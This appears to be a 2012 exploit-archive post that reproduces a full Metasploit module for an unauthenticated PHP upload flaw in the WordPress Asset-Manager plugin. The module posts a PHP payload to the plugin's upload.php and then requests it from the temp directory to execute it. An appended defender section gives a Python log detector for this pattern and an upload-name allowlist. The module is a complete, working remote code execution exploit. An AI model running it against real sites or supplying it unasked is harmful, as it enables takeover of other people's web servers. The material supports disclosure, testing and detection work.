WordPress Asset-Manager PHP File Upload Vulnerability

Posted 2012-12-31 09:22:33
This module, from the Metasploit exploit library, exploits a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
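As an added, defender-side example that is not part of the original post: a Python routine that flags in web-server access logs the two-step pattern this module produces (a POST to the plugin's upload.php, then a 200 on a .php file under wp-content/uploads/assets/temp/), plus the extension allowlist an upload handler should enforce so a .php name never reaches disk. The log lines, IPs and the uploaded filename are constructed.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format lines (not real traffic); the .php name is made up.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Dec/2012:09:22:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Dec/2012:09:22:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kQzXa.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [31/Dec/2012:09:30:15 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.9 - - [31/Dec/2012:10:00:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/x.php HTTP/1.1" 404 210 "-" "curl/7.26.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_RE = re.compile(r'/wp-content/plugins/asset-manager/upload\.php$')
# The plugin's temp directory should only ever serve assets, never server-side code.
TEMP_PHP_RE = re.compile(r'/wp-content/uploads/assets/temp/[^/]+\.php\d?$', re.IGNORECASE)

def detect(log_text):
    """Return (ip, reason, path, severity) tuples for Asset-Manager abuse patterns."""
    posted = defaultdict(int)   # ip -> number of POSTs to the plugin's upload.php
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue            # skip lines that are not in combined format
        ip, method, status = m['ip'], m['method'], int(m['status'])
        path = m['path'].split('?', 1)[0]
        if method == 'POST' and UPLOAD_RE.search(path):
            posted[ip] += 1     # unauthenticated endpoint hit: low on its own
            alerts.append((ip, 'post-to-asset-manager-upload', path, 'low'))
        elif TEMP_PHP_RE.search(path):
            if status == 200 and posted[ip]:
                alerts.append((ip, 'php-executed-from-temp-after-upload', path, 'high'))
            elif status == 200:
                alerts.append((ip, 'php-executed-from-temp', path, 'medium'))
            else:
                alerts.append((ip, 'php-probe-in-temp', path, 'low'))
    return alerts

def is_safe_upload_name(filename, allowed=('png', 'jpg', 'jpeg', 'gif', 'pdf')):
    """Allowlist check a hardened upload handler applies before saving a file."""
    name = filename.rsplit('/', 1)[-1].rsplit('\\', 1)[-1]  # drop any path component
    parts = name.lower().split('.')
    # Reject no extension, double extensions (shell.php.png) and anything off the list.
    return len(parts) == 2 and bool(parts[0]) and parts[1] in allowed
```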